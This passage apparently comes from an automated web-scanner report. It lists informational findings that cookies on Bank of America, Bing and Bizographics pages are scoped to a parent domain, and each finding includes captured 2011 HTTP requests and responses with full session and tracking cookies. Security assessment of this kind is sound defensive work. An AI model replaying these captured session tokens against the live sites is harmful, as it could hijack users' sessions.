14.59. https://www.bankofamerica.com/military  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /military

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /military HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:52 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:49:52 GMT
Location: https://www.bankofamerica.com/military/
Connection: close


14.60. https://www.bankofamerica.com/military/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /military/index.cfm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /military/index.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:53 GMT
Content-type: text/html; charset=UTF-8
Content-language: en-US
Set-cookie: TRACEID=PRODUCTION%2D171%2E148%2E194%2E109%2D12%3A49%3A53%3A769; Path=/military/; Domain=.bankofamerica.com; Secure
Set-cookie: PILOTSTATE=yes; Expires=Thu, 18 Apr 2041 12:49:52 GMT; Path=/military/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!-- Testing log - REMOVE - START -->


                                   <!-- Testing log - REMOVE - END -->


                   
...[SNIP]...

14.61. https://www.bankofamerica.com/privacy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /privacy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464&lti=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:49:53 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:49:53 GMT
Location: https://www.bankofamerica.com/privacy/
Connection: close


14.62. https://www.bankofamerica.com/www/en_US/global/hs_home/stylesheets/home_win_ns6.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/hs_home/stylesheets/home_win_ns6.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/global/hs_home/stylesheets/home_win_ns6.css HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:53 GMT
Content-type: text/css
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:53 GMT
Last-modified: Tue, 25 Nov 2008 19:59:27 GMT
Etag: "99e-492c591f"
Accept-ranges: bytes
Content-Length: 12756

.h3-whitetext {
   DISPLAY: inline; FONT-SIZE: 75%; COLOR: #FFFFFF; PADDING-TOP: 18px; FONT-FAMILY: Verdana;
   font-weight: bold
}

.h3-graytext {
   DISPLAY: inline; FONT-SIZE: 75%; COLOR: #333333;
...[SNIP]...

14.63. https://www.bankofamerica.com/www/en_US/global/js/masthead.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/global/js/masthead.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/global/js/masthead.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:55 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:55 GMT
Last-modified: Wed, 21 Jan 2009 15:42:02 GMT
Etag: "2aa-4977424a"
Accept-ranges: bytes
Content-Length: 1606

function submit_search(){ document.SiteSearchForm.submit(); }

function bt_rollover(ref, classRef) { eval(ref).className = classRef; }

function create_button(text, href, css_class, onclick_evt,
...[SNIP]...

14.64. https://www.bankofamerica.com/www/en_US/js/search/jquery-1.2.6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/js/search/jquery-1.2.6.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/js/search/jquery-1.2.6.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:23:59 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:23:59 GMT
Last-modified: Wed, 21 Jan 2009 15:45:14 GMT
Etag: "3d2e-4977430a"
Accept-ranges: bytes
Content-Length: 31043

/*
* jQuery 1.2.6 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 20
...[SNIP]...

14.65. https://www.bankofamerica.com/www/en_US/js/search/search-lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/en_US/js/search/search-lite.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/en_US/js/search/search-lite.js HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/Control.do?body=selectState&section=onlinebanking_enroll
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:02 GMT
Content-type: application/x-javascript
Vary: accept-encoding
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:24:02 GMT
Last-modified: Thu, 23 Apr 2009 13:34:52 GMT
Etag: "4be-49f06e7c"
Accept-ranges: bytes
Content-Length: 3881

// Search Autocomplete routines.
// updated: 2009.04.02
// English

var search_box_default = "Enter keyword(s)";
var search_box_prompt = "You must enter a keyword before clicking on Search button
...[SNIP]...

14.66. https://www.bankofamerica.com/www/global/js/tc_logging.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /www/global/js/tc_logging.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /www/global/js/tc_logging.js? HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
Referer: https://www.bankofamerica.com/homepage/overview.go
Cache-Control: max-age=0
If-Modified-Since: Wed, 01 Aug 2007 17:46:04 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
If-None-Match: "2f30-46b0c6dc"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No; ngen_throttle=964; hp_beta=B; TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; throttle_value=35; cmTPSet=Y; state=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US

Response

HTTP/1.1 304 Use local copy
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:24:59 GMT
Etag: "2f30-46b0c6dc"
Set-Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=0391ABCE700010701FF8C9030944B980; Path=/; Domain=.bankofamerica.com; Expires=Tue, 26-04-2021 12:24:59 GMT


14.67. http://www.bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; SRCHD=MS=1740344&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=I=1&TS=1303826034

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 13:53:57 GMT
Connection: close
Set-Cookie: _HOP=; domain=.bing.com; path=/
Set-Cookie: _SS=SID=DCF7931786ED411F92B64A98A5279BEF; domain=.bing.com; path=/
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF; expires=Thu, 25-Apr-2013 13:53:57 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; expires=Thu, 25-Apr-2013 13:53:57 GMT; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; expires=Thu, 25-Apr-2013 13:53:57 GMT; domain=.bing.com; path=/
Content-Length: 28615

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...

14.68. http://www.bing.com/HPImageArchive.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /HPImageArchive.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HPImageArchive.aspx?format=xml&idx=0&n=1&nc=1303826049818 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; RMS=F=Gg&A=AAAAAAAAAAAQ; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999&bIm=193

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2317
Content-Type: text/xml; charset=utf-8
Date: Tue, 26 Apr 2011 13:54:01 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1744674&SM=1&D=1740336&AF=NOFORM; expires=Thu, 25-Apr-2013 13:54:01 GMT; domain=.bing.com; path=/

<?xml version="1.0" encoding="utf-8" ?><images><image><startdate>20110426</startdate><fullstartdate>201104260700</fullstartdate><enddate>20110427</enddate><url>/fd/hpk2/ConeyIsland_EN-US583531935.jpg<
...[SNIP]...

14.69. http://www.bing.com/fd/ls/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /fd/ls/l

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fd/ls/l?IG=803a8b1ca015452f8e5a94ace7de8ed0&PM=Y&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22PC%22:3,%22FC%22:-1,%22BC%22:3,%22BS%22:8,%22H%22:11,%22C1%22:-1,%22C2%22:-1,%22BP%22:475,%22KP%22:-1,%22CT%22:487,%22IL%22:0}}&P=SERP&DA=Bl2 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 42
Content-Type: image/gif
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 26 Apr 2011 13:53:58 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; expires=Thu, 25-Apr-2013 13:53:58 GMT; domain=.bing.com; path=/

GIF89a.............!.......,...........L.;

14.70. http://www.bing.com/scopePopupHandler.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /scopePopupHandler.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scopePopupHandler.aspx?IID=SERP.1000&IG=803a8b1ca015452f8e5a94ace7de8ed0&PM=Y HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D1; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c803a8b1ca015452f8e5a94ace7de8ed0; SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; _SS=SID=DCF7931786ED411F92B64A98A5279BEF&CW=981&CH=999

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 13:54:00 GMT
Connection: close
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&ramp1=snrport4-release&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1744673&SM=1&D=1740336&AF=NOFORM; expires=Thu, 25-Apr-2013 13:53:59 GMT; domain=.bing.com; path=/
Content-Length: 4718

<div class="sc_pc" id="images"><ul class="sc_hl1"><li><a href="/images/search?q=wallpaper+filterui%3aimagesize-desktop_w_1024+filterui%3aimagesize-desktop_h_768&amp;qpvt=wallpaper" onmousedown="return
...[SNIP]...

14.71. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=response.firstdata.com&pid=1009 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://response.firstdata.com/?elqPURLPage=15
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
